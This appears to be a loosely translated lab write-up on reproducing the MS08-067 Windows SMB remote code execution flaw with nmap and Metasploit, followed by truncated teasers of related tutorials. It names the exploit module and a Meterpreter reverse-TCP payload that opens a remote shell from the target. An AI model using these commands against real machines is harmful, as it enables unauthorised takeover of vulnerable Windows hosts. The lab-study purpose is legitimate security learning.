Brief description of the vulnerability principle
The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote Procedure Call) request, which is triggered when the NEtPathCanonicalize function in the Server program is invoked through the MSRPC over SMB channel. The NetPathCanonicalize function is used to remotely access other hosts. The NetpwPathCanonicalize function is called to normalize the path of the remote access, and a stack buffer memory error occurs in the NetpwPathCanonicalize function, which can be exploited to implement remote code execution.
Vulnerability threat
It can remotely initiate a scan of the vulnerable host port and directly obtain the system authority of the vulnerable host, which is the highest severity vulnerability.
(After thinking about the opening of port 445 of XP or 2003 system, we can think of the sensational ms08-067)
Vulnerability recurrence
Attack aircraft 192.168.146.137
Target host 192.168.146.129
First scan the target host with nmap

Use the nmap vulnerability scan script to see if the vulnerability is available

Open artifact

Find the exploit module for ms08-067

Use the use command to select the exploit module we want to use: use exploit/windows/smb/ms08_067_netapi
Use show options to view configuration information and set the target host.

Select payload as the attack: set payload windows/meterpreter/reverse_tcp


Show targets can see supported systems
Note:Remember not to choose automatic detection.0 is automatic detection,Automatic detection is not allowed! !
The attack is over.
Sphere of influence: Windows 2000 Windows XP Windows Server 2003 Reproduce the environment win xp :192.168.31.49 kali :192.168.31.117 recurrent: Does nmap scan vulnerability exist: Open metasploite, f...
MS08-067 vulnerability reproduction experiment Realize environment preparation: Attack machine: kali (IP: 192.168.153.129) Target drone: Windows XP (IP: 192.168.153.128) Attack tools: metasploit-frame...
Metasploit ms08_067 vulnerability attack practice Environmental preparation Two virtual machines, one is kali, as an attacker, and the other is windows xp sp3 Host IP kali 192.168.78.145 windows xp sp...
A vulnerability recovery experiment made by a network space security professional student, if there is a mistake or improvement, please advise. MS08-067 Vulnerability Analysis and Reclaim content MS08...
The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: various versions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even Windows 7 Pro-Beta in...
Summary:Detailed explanation MS08-067 Remote Code Perform Vulnerability (CVE-2008-4250) and defense process This article shares from Huawei Yunshi District "Windows Vulnerability Utilization MS08...
(For testing only, but now it can not be used Reprinted from: http: //www.cnhonkerarmy.com/thread-167512-1-1.html) Detailed Vulnerability: 44...
table of Contents Vulnerability description Influence system Vulnerability detection Exploit Vulnerability hardening Vulnerability description A remote code execution vulnerability exists ...
This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...
#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...